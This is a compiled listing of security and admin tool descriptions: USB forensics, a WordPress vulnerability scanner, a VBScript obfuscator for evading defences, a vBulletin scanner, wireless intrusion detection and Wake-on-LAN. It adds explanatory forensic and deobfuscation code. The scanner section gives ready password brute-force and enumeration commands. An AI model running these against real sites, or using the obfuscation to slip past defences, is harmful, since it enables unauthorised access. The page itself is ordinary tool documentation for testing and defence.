WPDBUSENUMROOT\UMB\2&37C186B&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&0#
UTC Time : 2015-01-18 20:31:34.138399
EventID : 2004 | Description : UMDFHostAddDeviceBegin | Computer : 37L4247F27-25 | User SID : S-1-5-19 | User : LocalService
Lifetime : 8c076f4d-6405-4414-a829-ee44a94e3893
WPDBUSENUMROOT\UMB\2&37C186B&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&0#
...

To dump the same events in XML format, just add the "-x" flag:
PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -df -x
USBTracker alpha
2015 - Sysinsider
USBTracker it's a free tool which allow you to extract
some USB artifacts from a Windows OS (Vista and later).
You must execute USBTracker inside a CMD/Powershell
console runnnig with administror privileges to be able to
dump some
log files artifacts.
USB related event(s) found in the event log :
=============================================
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-DriverFrameworks-UserMode" Guid="2e35aaeb-857f-4beb-a418-2e6c0e54d988"></Provider>
<EventID Qualifiers="">1003</EventID>
<Version>1</Version>
<Level>4</Level>
<Task>17</Task>
<Opcode>1</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2015-01-18 20:31:34.013599"></TimeCreated>
<EventRecordID>2</EventRecordID>
<Correlation ActivityID="" RelatedActivityID=""></Correlation>
<Execution ProcessID="836" ThreadID="1488"></Execution>
<Channel>Microsoft-Windows-DriverFrameworks-UserMode/Operational</Channel>
<Computer>37L4247F27-25</Computer>
<Security UserID="S-1-5-18"></Security>
</System>
<UserData><UMDFDriverManagerHostCreateStart lifetime="8c076f4d-6405-4414-a829-ee44a94e3893" xmlns:auto-ns2="http://schemas.microsoft.com/win/2004/08/events" xmlns="http://www.microsoft.com/DriverFrameworks/UserMode/Event"><HostGuid>{193a1820-d9ac-4997-8c55-be817523f6aa}</HostGuid>
<DeviceInstanceId>WPDBUSENUMROOT.UMB.2&amp;37C186B&amp;0&amp;STORAGE#VOLUME#_??_USBSTOR#DISK&amp;VEN_KINGSTON&amp;PROD_DATATRAVELER_2.0&amp;REV_1.00#0019B931D970C8C0C5DB00B9&amp;0#</DeviceInstanceId>
</UMDFDriverManagerHostCreateStart>
</UserData>
</Event>

...

Dumping events and artifacts from the setupapi.dev.log log file:
To dump all USB devices installation events (generally first use
of devices) from the setupapi.dev.log log file, use the "-sa" flag.
PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -sa
USBTracker alpha
2015 - Sysinsider
USBTracker it's a free tool which allow you to extract
some USB artifacts from a Windows OS (Vista and later).
You must execute USBTracker inside a CMD/Powershell
console runnnig with administror privileges to be able to
dump some log files artifacts.
>>>  [Setup online Device Install (Hardware initiated) - usb\vid_0930&pid_6544\0019b931d970c8c0c5db00b9]
>>>  Section start 2015/01/18 21:31:02.314
>>>  [Setup online Device Install (Hardware initiated) - storage\volume\_??_usbstor#disk&ven_kingston&prod_datatraveler_2.0&rev_1.00#0019b931d970c8c0c5db00b9&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}]
>>>  Section start 2015/01/18 21:31:28.241
>>>  [Setup online Device Install (Hardware initiated) - WpdBusEnumRoot\UMB\2&37c186b&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&0#]
>>>  Section start 2015/01/18 21:31:30.956
>>>  [Setup online Device Install (Hardware initiated) - usb\root_hub20\4&56dcbd&0]
>>>  Section start 2015/01/18 21:31:59.457
>>>  [Setup online Device Install (Hardware initiated) - usb\root_hub\4&38d808bf&0]
>>>  Section start 2015/01/18 21:32:28.925
>>>  [Setup online Device Install (Hardware initiated) - usb\root_hub\4&fee3d1d&0]
>>>  Section start 2015/01/18 21:32:31.593
>>>  [Setup online Device Install (Hardware initiated) - usb\root_hub20\4&3a831ac0&0]
>>>  Section start 2015/01/18 21:32:32.825
>>>  [Setup online Device Install (Hardware initiated) - usb\vid_0458&pid_0137\5&1d8fb94c&0&3]
>>>  Section start 2015/01/18 21:32:36.866
>>>  [Setup online Device Install (Hardware initiated) - usb\vid_05ac&pid_8242\5&1d8fb94c&0&5]
>>>  Section start 2015/01/18 21:32:47.037
>>>  [Setup online Device Install (Hardware initiated) - usb\vid_05ac&pid_8502\8t9a9e8d577k3l00]
>>>  Section start 2015/01/18 21:32:48.160
...
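Two of the artifacts USBTracker dumps, the USBSTOR key names (the -u/-uu output) and the setupapi.dev.log "Section start" timestamps (the -sa output), are enough to answer when a given stick first appeared on the machine: the registry names the device, the log dates its first installation, and the serial number joins the two. The following is an added Python example and not USBTracker's code. Its key names, serial subkeys and log lines are constructed from the sample output shown above, and the rule that an '&' in the second position of an instance id marks a device without a serial number is the usual forensic heuristic, not something USBTracker states.

```python
"""Join USBSTOR registry key names with setupapi.dev.log install sections on
serial number. Added example, not USBTracker's code; sample data below is
constructed from the output shown on the page. On a live system the inputs
come from HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR and
C:\\Windows\\INF\\setupapi.dev.log."""
import re
from datetime import datetime

# (USBSTOR key name, serial subkey) pairs as "usbtracker.py -uu" lists them.
USBSTOR_ENTRIES = [
    ("Disk&Ven_Kingston&Prod_DataTraveler_2.0&Rev_1.00", "0019B931D970C8C0C5DB00B9&0"),
    ("CdRom&Ven_HL-DT-ST&Prod_DVDRAM_GP08NU20&Rev_1.00", "00101016400086C55&0"),
]

# Constructed excerpt in setupapi.dev.log layout (values from the -sa output).
SETUPAPI_LOG = """\
>>>  [Setup online Device Install (Hardware initiated) - usb\\vid_0930&pid_6544\\0019b931d970c8c0c5db00b9]
>>>  Section start 2015/01/18 21:31:02.314
>>>  [Setup online Device Install (Hardware initiated) - storage\\volume\\_??_usbstor#disk&ven_kingston&prod_datatraveler_2.0&rev_1.00#0019b931d970c8c0c5db00b9&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}]
>>>  Section start 2015/01/18 21:31:28.241
>>>  [Setup online Device Install (Hardware initiated) - usb\\vid_0458&pid_0137\\5&1d8fb94c&0&3]
>>>  Section start 2015/01/18 21:32:36.866
>>>  [Setup online Device Install (Hardware initiated) - usb\\root_hub20\\4&56dcbd&0]
>>>  Section start 2015/01/18 21:31:59.457
"""

KEY_RE = re.compile(r"^(?P<type>[^&]+)&Ven_(?P<vendor>[^&]*)&Prod_(?P<product>[^&]*)&Rev_(?P<rev>.*)$")
SECTION_RE = re.compile(r"^>>>\s+\[(?P<title>.*?) - (?P<instance>[^\]]+)\]\s*$")
START_RE = re.compile(r"^>>>\s+Section start (?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}\.\d+)")
USB_DEV_RE = re.compile(r"^usb\\vid_([0-9a-f]{4})&pid_([0-9a-f]{4})\\([^\\]+)$", re.I)
USBSTOR_VOL_RE = re.compile(r"usbstor#(?P<hwid>[^#]+)#(?P<serial>[^&#]+)", re.I)


def parse_usbstor_key(name):
    """Split 'Disk&Ven_X&Prod_Y&Rev_Z' into its fields; None if not that shape."""
    m = KEY_RE.match(name)
    return m.groupdict() if m else None


def serial_from_subkey(subkey):
    """USBSTOR serial subkeys are '<serial>&<instance>'. When a device reports
    no serial, Windows makes up '<n>&<hex>&0', so a '&' in second position
    means there is no real serial to correlate on (forensic heuristic)."""
    if len(subkey) > 1 and subkey[1] == "&":
        return None
    return subkey.split("&")[0].lower()


def classify(instance):
    """Extract vid/pid/serial from a usb\\ instance or a USBSTOR volume path."""
    m = USB_DEV_RE.match(instance)
    if m:
        vid, pid, tail = m.groups()
        serial = None if "&" in tail else tail.lower()   # '&' marks a made-up id
        return {"kind": "usb", "vid": vid.lower(), "pid": pid.lower(), "serial": serial}
    m = USBSTOR_VOL_RE.search(instance)
    if m:
        return {"kind": "volume", "hwid": m.group("hwid").lower(),
                "serial": m.group("serial").lower()}
    return {"kind": "other", "serial": None}


def parse_setupapi(text):
    """One record per '[... - <instance>]' header followed by its 'Section start'."""
    records, pending = [], None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            pending = m.group("instance")
            continue
        m = START_RE.match(line)
        if m and pending is not None:
            ts = datetime.strptime(m.group("ts"), "%Y/%m/%d %H:%M:%S.%f")
            records.append({"instance": pending, "start": ts, **classify(pending)})
            pending = None
    return records


def first_install_times(text):
    """Earliest install timestamp per serial; hubs and serial-less ids are dropped."""
    first = {}
    for rec in parse_setupapi(text):
        s = rec["serial"]
        if s is not None and (s not in first or rec["start"] < first[s]):
            first[s] = rec["start"]
    return first


def report(entries, log_text):
    """Join USBSTOR entries with setupapi timestamps on serial number."""
    installs = first_install_times(log_text)
    rows = []
    for key, subkey in entries:
        fields = parse_usbstor_key(key) or {"type": key, "vendor": "", "product": "", "rev": ""}
        serial = serial_from_subkey(subkey)
        rows.append({**fields, "serial": serial, "first_install": installs.get(serial)})
    return rows


if __name__ == "__main__":
    for row in report(USBSTOR_ENTRIES, SETUPAPI_LOG):
        print(row["vendor"], row["product"], row["serial"], row["first_install"])
```

On the constructed data the Kingston DataTraveler resolves to 2015/01/18 21:31:02.314, the earlier of its two log sections (the raw usb\vid entry precedes the volume entry), while the DVD drive has a serial that never appears in the log and stays unresolved. Remember the caveats the USBDeview notes above also apply here: setupapi.dev.log records the first installation, not every later plug event, and devices without a hardware serial cannot be told apart by this join.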

Download USBTracker
USERPROFILESVIEW - VIEW USER PROFILES
INFORMATION ON YOUR WINDOWS
UserProfilesView displays the list of all user profiles that you
currently have in your system. For each user profile, the
following information is displayed: Domain\User Name, Profile
Path, Last Load Time, Registry File Size, User SID, and more.
You can save the profiles list into a text/xml/html/csv file.
Versions History
Version 1.10
Added 'Run As Administrator' option (Ctrl+F11)
Added 'Registry Loaded' column (Yes/No), which
specifies whether the Registry key of the user is
loaded into the HKEY_USERS key.
Added 'Logon Time' column, which specifies the
logon time of the current logged on user.
UserProfilesView now displays the system users that
it failed to get in previous versions.
Version 1.01 - Added command-line options for sorting.
Version 1.00 - First release.
System Requirements
This utility works with any version of Windows, starting from
Windows 2000, and up to Windows 10.
Using UserProfilesView
UserProfilesView doesn't require any installation process or
additional dll files. In order to start using it, simply run the
executable file - UserProfilesView.exe
After running it, the main window will display the list of all user
profiles. You can select one or more items, and then save the
list into a text/xml/html/csv file.
Command-Line Options
/stext <Filename>      Save the list of all profiles into a regular text file.
/stab <Filename>       Save the list of all profiles into a tab-delimited text file.
/scomma <Filename>     Save the list of all profiles into a comma-delimited text file.
/stabular <Filename>   Save the list of all profiles into a tabular text file.
/shtml <Filename>      Save the list of all profiles into an HTML file (Horizontal).
/sverhtml <Filename>   Save the list of all profiles into an HTML file (Vertical).
/sxml <Filename>       Save the list of all profiles to an XML file.
/sort <column>         This command-line option can be used with other save options
                       for sorting by the desired column. If you don't specify this
                       option, the list is sorted according to the last sort that you
                       made from the user interface. The <column> parameter can specify
                       the column index (0 for the first column, 1 for the second
                       column, and so on) or the name of the column, like "Profile Path"
                       and "User Name". You can specify the '~' prefix character
                       (e.g: "~Last Load Time") if you want to sort in descending order.
                       You can put multiple /sort in the command-line if you want to
                       sort by multiple columns. Examples:
                       UserProfilesView.exe /shtml "f:\temp\profiles.html" /sort 2 /sort ~1
                       UserProfilesView.exe /shtml "f:\temp\profiles.html" /sort "User Name"
/nosort                When you specify this command-line option, the list will be
                       saved without any sorting.

Download UserProfilesView

VANE - WORDPRESS VULNERABILITY SCANNER (A GPL FORK OF WPSCAN)

Vane is a GPL fork of the now non-free popular WordPress vulnerability scanner WPScan.


INSTALL

Prerequisites
Windows not supported
Ruby >= 1.9
RubyGems
Git

Installing on Debian/Ubuntu
sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby libxml2 libxml2-dev libxslt1-dev ruby-dev
git clone https://github.com/delvelabs/vane.git
cd vane
sudo gem install bundler && bundle install --without test development

Installing on Fedora
sudo yum install libcurl-devel
git clone https://github.com/delvelabs/vane.git
cd vane
sudo gem install bundler && bundle install --without test development

Installing on Archlinux
pacman -Sy ruby
pacman -Sy libyaml
git clone https://github.com/delvelabs/vane.git
cd vane
sudo gem install bundler && bundle install --without test development
gem install typhoeus
gem install nokogiri

Installing on Mac OS X
git clone https://github.com/delvelabs/vane.git
cd vane
sudo gem install bundler && bundle install --without test development

KNOWN ISSUES

Typhoeus segmentation fault
Update cURL to version >= 7.21 (may have to install from source). See http://code.google.com/p/vane/issues/detail?id=81

Proxy not working
Update cURL to version >= 7.21.7 (may have to install from source).
Installation from sources:
Grab the sources from http://curl.haxx.se/download.html
Decompress the archive
Open the folder with the extracted files
Run ./configure
Run make
Run sudo make install
Run sudo ldconfig

cannot load such file -- readline
Run sudo aptitude install libreadline5-dev libncurses5-dev
Then, open the directory of the readline gem (you have to locate it):
cd ~/.rvm/src/ruby-1.9.2-p180/ext/readline
ruby extconf.rb
make
make install

See http://vvv.tobiassjosten.net/ruby-on-rails/fixing-readline-forthe-ruby-on-rails-console/ for more details

VANE ARGUMENTS
--update                          Update to the latest revision.
--url | -u                        The WordPress URL/domain to scan.
--force | -f                      Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)]      Enumeration. Options:
                                  u         usernames from id 1 to 10
                                  u[10-20]  usernames from id 10 to 20 (you must write the [] chars)
                                  p         plugins
                                  vp        only vulnerable plugins
                                  ap        all plugins (can take a long time)
                                  tt        timthumbs
                                  t         themes
                                  vt        only vulnerable themes
                                  at        all themes (can take a long time)
                                  Multiple values are allowed: '-e tt,p' will enumerate timthumbs and plugins. If no option is supplied, the default is 'vt,tt,u,vp'.
--exclude-content-based ''        Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied. You do not need to provide the regexp delimiters, but you must write the quotes (single or double).
--config-file | -c                Use the specified config file.
--follow-redirection              If the target url has a redirection, it will be followed without asking if you wanted to do so or not.
--wp-content-dir                  WPScan tries to find the content directory (i.e. wp-content) by scanning the index page, however you can specify it. Subdirectories are allowed.
--wp-plugins-dir                  Same as --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed.
--proxy <[protocol://]host:port>  Supply a proxy (will override the one from conf/browser.conf.json). HTTP, SOCKS4, SOCKS4A and SOCKS5 are supported. If no protocol is given (format host:port), HTTP will be used.
--proxy-auth username:password    Supply the proxy login credentials (will override the one from conf/browser.conf.json).
--basic-auth username:password    Set the HTTP Basic authentication.
--wordlist | -w                   Supply a wordlist for the password bruter and do the brute.
--threads | -t                    The number of threads to use when multithreading requests (will override the value from conf/browser.conf.json).
--username | -U                   Only brute force the supplied username.
--help | -h                       This help screen.
--verbose | -v                    Verbose output.
VANE EXAMPLES
Do 'non-intrusive' checks...
ruby vane.rb --url www.example.com

Do wordlist password brute force on enumerated users using 50 threads...
ruby vane.rb --url www.example.com --wordlist darkc0de.lst --threads 50

Do wordlist password brute force on the 'admin' username only...
ruby vane.rb --url www.example.com --wordlist darkc0de.lst --username admin

Enumerate installed plugins...
ruby vane.rb --url www.example.com --enumerate p
VANETOOLS ARGUMENTS
--help | -h                                 This help screen.
--Verbose | -v                              Verbose output.
--update | -u                               Update to the latest revision.
--generate_plugin_list [number of pages]    Generate a new data/plugins.txt file (supply number of *pages* to parse, default: 150).
--gpl                                       Alias for --generate_plugin_list
--check-local-vulnerable-files | --clvf <local directory>
                                            Perform a recursive scan in the <local directory> to find vulnerable files or shells.
VANETOOLS EXAMPLES
Generate a new 'most popular' plugin list, up to 150 pages...
ruby vanetools.rb --generate_plugin_list 150

Locally scan a WordPress installation for vulnerable files or shells:
ruby vanetools.rb --check-local-vulnerable-files /var/www/wordpress/

Download Vane

VBS-OBFUSCATOR - VBSCRIPT OBFUSCATION TO ALLOW PENTESTERS BYPASS COUNTERMEASURES

VBScript obfuscation to allow PenTesters to bypass countermeasures.
Sample Script Output
C:\tools>python obfuscator.py test.vbs out.vbs
Char 109 -> 5505-5396
Char 115 -> 1113775/9685
Char 103 -> 540853/5251
Char 98 -> -2629+2727
Char 111 -> 291-180
Char 120 -> 826320/6886
Char 32 -> 118016/3688
Char 34 -> -2379+2413
Char 72 -> 2401-2329
Char 101 -> -1347+1448
Char 108 -> 759780/7035
Char 108 -> 5391-5283
Char 111 -> 743700/6700
Char 32 -> 7654-7622
Char 87 -> 636927/7321
Char 111 -> -46+157
Char 114 -> 7591-7477
Char 108 -> -9028+9136
Char 100 -> 285800/2858
Char 33 -> 5241-5208
Char 34 -> 7209-7175
Char 44 -> 234080/5320
Char 32 -> 104352/3261
Char 118 -> -3369+3487
Char 98 -> -7575+7673
Char 79 -> -9140+9219
Char 107 -> 4317-4210
Char 79 -> -5433+5512
Char 110 -> -1294+1404
Char 108 -> 6672-6564
Char 121 -> 1109-988
Char 32 -> 166080/5190
Char 43 -> 95675/2225
Char 32 -> 3156-3124
Char 118 -> -9572+9690
Char 98 -> -3093+3191
Char 73 -> 53947/739
Char 110 -> -2239+2349
Char 102 -> 554982/5441
Char 111 -> 4953-4842
Char 114 -> 907440/7960
Char 109 -> 3406-3297
Char 97 -> 3570-3473
Char 116 -> 3624-3508
Char 105 -> 137130/1306
Char 111 -> 632-521
Char 110 -> 8712-8602
Char 44 -> 94468/2147
Char 32 -> 14176/443
Char 34 -> 884/26
Char 84 -> -9768+9852
Char 104 -> -5195+5299
Char 105 -> 706335/6727
Char 115 -> 6469-6354
Char 32 -> 250304/7822
Char 105 -> -9605+9710
Char 115 -> 771190/6706
Char 32 -> -1319+1351
Char 97 -> 674053/6949
Char 32 -> -6907+6939
Char 109 -> 3365-3256
Char 101 -> 170791/1691
Char 115 -> 17020/148
Char 115 -> 3217-3102
Char 97 -> -6948+7045
Char 103 -> -9545+9648
Char 101 -> 9670-9569
Char 98 -> 926002/9449
Char 111 -> 130869/1179
Char 120 -> 255600/2130
Char 34 -> -1384+1418
Char 42 -> 1784-1742
Done!

Results (comparison)

First output
Dim SzVeVmXkoEZx, LALrsGQYjZtj, kLTOaGJfsmSG
SzVeVmXkoEZx =
"6974-6865*602140/5236*45732/444*-8743+8841*8842-8731*517
9-5059*-4646+4678*892-858*5573-5501*129-28*9855-9747*-668
1+6789*-9095+9206*257184/8037*311721/3583*-7211+7322*7416
84/6506*-5620+5728*241300/2413*198-165*-9925+9959*6380-63
36*5552-5520*-9222+9340*569-471*-6484+6563*6988-6881*1285
33/1627*-5150+5260*4828-4720*5616-5495*6062-6030*5407-536
4*313728/9804*-9272+9390*-767+865*3735-3662*-2705+2815*-4
151+4253*73704/664*-9531+9645*-7310+7419*-1882+1979*31713055*9554-9449*2676-2565*-1012+1122*107448/2442*4055-4023
*-6753+6787*2058-1974*-5464+5568*428610/4082*2479-2364*-3
013+3045*-9195+9300*128225/1115*56448/1764*-6899+6996*161
760/5055*253752/2328*756288/7488*-4081+4196*29900/260*-31
64+3261*-6830+6933*-6580+6681*-8764+8862*861360/7760*3308
40/2757*-2407+2441"
LALrsGQYjZtj = Split(SzVeVmXkoEZx,
chr(eval(261366/6223)))
for each SKhxsIKQEybA in LALrsGQYjZtj
kLTOaGJfsmSG = kLTOaGJfsmSG & chr(eval(SKhxsIKQEybA))
next
execute(kLTOaGJfsmSG)

Second output
Dim wEQHvB, vsSBaV, pwgtko
wEQHvB =
"-1912+2021*168-53*938948/9116*5796-5698*666666/6006*938818*-4889+4921*-9635+9669*302112/4196*-9587+9688*-4950+50
58*1012608/9376*-6763+6874*235232/7351*-8833+8920*412920/
3720*1007190/8835*594432/5504*-5605+5705*1113-1080*9516-9
482*347644/7901*181536/5673*198712/1684*615734/6283*779-7
00*6051-5944*-2574+2653*172370/1567*2086-1978*681472/5632
*4765-4733*-2746+2789*54880/1715*2593-2475*733040/7480*-5
259+5332*-7261+7371*103326/1013*-8585+8696*7371-7257*6640
-6531*4564-4467*-6527+6643*62265/593*-1349+1460*2314-2204
*-5438+5482*-5860+5892*4779-4745*1086-1002*-265+369*12761171*2588-2473*-2914+2946*101850/970*698050/6070*181760/5
680*3610-3513*236896/7403*5004-4895*4565-4464*720245/6263
*812360/7064*3582-3485*36977/359*4691-4590*482944/4928*-7
73+884*546720/4556*5235-5201"
vsSBaV = Split(wEQHvB, chr(eval(1039-997)))
for each KxRKRt in vsSBaV
pwgtko = pwgtko & chr(eval(KxRKRt))
next
execute(pwgtko)
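The obfuscation above is reversible without ever running the script: the separator and every character are plain integer arithmetic wrapped in chr(eval(...)). The decoder below is an added example for analysts triaging such scripts, not code from VBS-Obfuscator; it assumes the script shape shown in the two outputs (a quoted payload string, a Split on chr(eval(term)), terms of the form a+b, a-b, -a+b or a/b) and rebuilds its sample from the per-character log printed on this page.

```python
"""Decode VBScript obfuscated in the arithmetic-expression style shown above.

Assumptions (not from the page): the payload is assigned with name = "...",
the separator comes from chr(eval(<term>)) inside Split(...), and each term is
a+b, a-b, -a+b or a/b. No eval() is used anywhere: every term is parsed and
computed with integer arithmetic, so hostile input cannot execute anything.
"""
import re

# Constructed sample: the 71 per-character terms from the obfuscator log on this
# page, joined with the '*' separator (term 1784-1742 = 42) into the script shape
# shown under "First output". Variable names are placeholders.
_TERMS = (
    "5505-5396*1113775/9685*540853/5251*-2629+2727*291-180*826320/6886*"
    "118016/3688*-2379+2413*2401-2329*-1347+1448*759780/7035*5391-5283*"
    "743700/6700*7654-7622*636927/7321*-46+157*7591-7477*-9028+9136*"
    "285800/2858*5241-5208*7209-7175*234080/5320*104352/3261*-3369+3487*"
    "-7575+7673*-9140+9219*4317-4210*-5433+5512*-1294+1404*6672-6564*"
    "1109-988*166080/5190*95675/2225*3156-3124*-9572+9690*-3093+3191*"
    "53947/739*-2239+2349*554982/5441*4953-4842*907440/7960*3406-3297*"
    "3570-3473*3624-3508*137130/1306*632-521*8712-8602*94468/2147*"
    "14176/443*884/26*-9768+9852*-5195+5299*706335/6727*6469-6354*"
    "250304/7822*-9605+9710*771190/6706*-1319+1351*674053/6949*-6907+6939*"
    "3365-3256*170791/1691*17020/148*3217-3102*-6948+7045*-9545+9648*"
    "9670-9569*926002/9449*130869/1179*255600/2130*-1384+1418"
)
SAMPLE_VBS = (
    "Dim aQx, bQx, cQx\n"
    f'aQx = "{_TERMS}"\n'
    "bQx = Split(aQx, chr(eval(1784-1742)))\n"
    "for each dQx in bQx\n"
    "cQx = cQx & chr(eval(dQx))\n"
    "next\n"
    "execute(cQx)\n"
)

# One obfuscated term: optional leading minus, integer, one of + - /, integer.
_TERM = re.compile(r"^(-?\d+)([+\-/])(\d+)$")
# The Split(<var>, chr(eval(<term>))) call that reveals both the separator and
# the name of the variable holding the payload string.
_SPLIT = re.compile(r"Split\(\s*(\w+)\s*,\s*chr\(eval\(([^)]+)\)\)\s*\)", re.I)


def eval_term(term: str) -> int:
    """Compute one term with integer arithmetic (never eval())."""
    m = _TERM.match(term.strip())
    if not m:
        raise ValueError(f"unsupported term: {term!r}")
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    if op == "+":
        return a + b
    if op == "-":
        return a - b
    if b == 0 or a % b:  # the obfuscator only emits exact divisions
        raise ValueError(f"non-integer division: {term!r}")
    return a // b


def looks_obfuscated(vbs: str) -> bool:
    """Cheap triage signal: a Split + chr(eval(...)) rebuild feeding execute()."""
    low = vbs.lower()
    return "chr(eval(" in low and "split(" in low and "execute(" in low


def deobfuscate(vbs: str) -> str:
    """Recover the original script text from an obfuscated one."""
    m = _SPLIT.search(vbs)
    if not m:
        raise ValueError("no Split(var, chr(eval(...))) pattern found")
    payload_var, sep = m.group(1), chr(eval_term(m.group(2)))
    assign = re.search(re.escape(payload_var) + r'\s*=\s*"([^"]*)"', vbs)
    if not assign:
        raise ValueError(f"no string assigned to {payload_var}")
    # Dumps copied from a wrapped page may carry line breaks inside the string.
    terms = assign.group(1).replace("\n", "").split(sep)
    return "".join(chr(eval_term(t)) for t in terms)


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_VBS))
```

Note that the per-character log on the page ends with the separator's own term (Char 42), which is why the decoder reads the separator from the Split call rather than from the payload.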

Download VBS-Obfuscator
VBSCAN - A BLACK BOX VBULLETIN VULNERABILITY SCANNER

VBScan is a Black Box vBulletin vulnerability scanner, written in Perl.
Demo on YouTube: (embedded video)

Security Bug Found by VBScan in Ubuntu / Fedora / Python forums by VBScan Vulnerability Scanner (embedded video)

Report any bug to: me@reza.es

Download VBScan
WAIDPS - WIRELESS AUDITING, INTRUSION DETECTION & PREVENTION SYSTEM

WAIDPS is an open source wireless swiss knife written in Python that works in a Linux environment. It is a multipurpose tool designed for auditing (penetration testing) networks, detecting wireless intrusion (WEP/WPA/WPS attacks) and also intrusion prevention (stopping a station from associating to an access point). Apart from these, it will harvest all WiFi information in the surrounding area and store it in databases. This is useful when auditing a network whose access point is MAC filtered or has a hidden SSID and there isn't any existing client at that moment.
WAIDPS may be useful to penetration testers, wireless trainers, law enforcement agencies and those who are interested in learning more about wireless auditing and protection. The primary purpose of this script is to detect intrusion. Once a wireless attack is detected, it is displayed on screen and also logged to file. Additional features added to the current script which previous WIDS did not have are:
automatically save the attack packets into a file
interactive mode where users are allowed to perform many functions
allow the user to analyse captured packets
load a previously saved pcap file or any other pcap file to be examined
customizing filters
customize detection threshold (sensitivity of IDS in detection)
At present, WAIDPS is able to detect the following wireless attacks and will subsequently add other detections found in the previous WIDS:
Association / Authentication flooding
Detect mass deauthentication which may indicate a possible WPA attack for handshake
Detect possible WEP attack using the ARP request replay method
Detect possible WEP attack using chopchop method
Detect possible WPS pin bruteforce attack by Reaver, Bully, etc.
Detection of Evil-Twin
Detection of Rogue Access Point

The whole structure of the Wireless Auditing, Intrusion Detection & Prevention System will comprise:
Harvesting WiFi Information [Done]
Intrusion Detection [Partially Done]
Intrusion Prevention [Partially Done]
Auditing (Testing network) [Coming Soon]
Other additional items include analyzing of packets, display of captured dump, display of network barchart and much more.

Requirements

No special equipment is required to use this script as long as you have the following:
1. Root access (admin)
2. Wireless interface which is capable of monitoring and injection
3. Python 2.7 installed
4. Aircrack-NG suite installed
5. TShark installed
6. TCPDump installed
7. Mergecap installed (for joining pcap files)
8. xterm installed
Read more here.

Download WAIDPS
WAKEMEONLAN V1.71 - TURN ON COMPUTERS ON YOUR NETWORK WITH WAKE-ON-LAN PACKET

This utility allows you to easily turn on one or more computers remotely by sending a Wake-on-LAN (WOL) packet to the remote computers.
When your computers are turned on, WakeMeOnLan allows you to scan your network, collect the MAC addresses of all your computers, and save the computers list into a file. Later, when your computers are turned off or in standby mode, you can use the stored computers list to easily choose the computer you want to turn on, and then turn on all these computers with a single click.
WakeMeOnLan also allows you to turn on a computer from command-line, by specifying the computer name, IP address, or the MAC address of the remote network card.

System Requirements And Limitations

On the computer that you run WakeMeOnLan: WakeMeOnLan works on any version of Windows, starting from Windows 2000 and up to Windows 8, including x64 versions of Windows.
On the remote computer: WakeMeOnLan can turn on the remote computer only if this feature is supported and enabled on the remote computer. Be aware that the Wake-on-LAN feature only works on wired networks. Wireless networks are not supported.
In order to enable the Wake-on-LAN feature on the remote computer:
On some computers, you may need to enable this feature in the BIOS setup.
In the network card properties, you should go to the 'Power Management' and/or 'Advanced' tabs of the network adapter, and turn on the Wake-on-LAN feature.

Start Using WakeMeOnLan

WakeMeOnLan doesn't require any installation process or additional DLL files. In order to start using it, simply run the executable file - WakeMeOnLan.exe
After running WakeMeOnLan, the first thing to do is to scan your network and collect the MAC addresses/computer names/IP addresses on your network. In order to start the network scan, simply press F5. If WakeMeOnLan scans the wrong IP addresses range, you can stop the scan process by pressing F6, and then go to the 'Advanced Options' window (F9), and choose the correct IP addresses range to scan.
All the computers information collected by WakeMeOnLan is saved into the configuration file (WakeMeOnLan.cfg) for loading it the next time that you use WakeMeOnLan. You can also scan your network multiple times, and if there are new computers on your network, they'll be added to the list. Scanning your network also updates the current status of every computer - 'on' (green icon) or 'off' (red icon). If there are obsolete computers on the list, you can remove them by using the 'Delete Selected Items' option.

Turn On Remote Computers On Your Network

After scanning your network for the first time, it's very easy to turn on the computers you need. Simply run WakeMeOnLan, select the desired computers, and then choose the 'Wake Up Selected Computer' option (F8).
After using the 'Wake Up Selected Computer' option, you can run another network scan to verify that the computers are really turned on. Turned on computers are displayed with a green icon.

External MAC Addresses File

WakeMeOnLan uses an internal MAC Addresses database in order to display the company name of every network adapter. However, the internal database is not always updated with the latest MAC address assignments.
You can manually download the latest MAC addresses file from http://standards-oui.ieee.org/oui.txt and then put oui.txt in the same folder where WakeMeOnLan.exe is located. When you run WakeMeOnLan.exe, it'll automatically load and use the external oui.txt instead of the internal MAC addresses database.

Turn On a Computer From Command-Line

WakeMeOnLan allows you to wake up a computer on your network without displaying any user interface, by using the /wakeup command-line option. You can specify the computer name, IP address, or the free user text that you typed in the properties window, as long as the computer information is stored inside the .cfg file. You can also specify the MAC address of the remote network card, even if the computer is not stored in the .cfg file.
Optionally, you can specify the port number in the second parameter, and the broadcast address in the third parameter.
Examples:
WakeMeOnLan.exe /wakeup 192.168.1.25
WakeMeOnLan.exe /wakeup Comp01
WakeMeOnLan.exe /wakeup Comp02
WakeMeOnLan.exe /wakeup 40-65-81-A7-16-23
WakeMeOnLan.exe /wakeup 406581A71623
WakeMeOnLan.exe /wakeup Comp02 30000 192.168.0.255
WakeMeOnLan.exe /wakeup 192.168.1.25 20000 192.168.1.255
You can also wake up all computers in the list by using the /wakeupall command-line option. Like the /wakeup command-line option, you can optionally specify the broadcast address and port number.
Examples:
WakeMeOnLan.exe /wakeupall
WakeMeOnLan.exe /wakeupall 20000 192.168.2.255
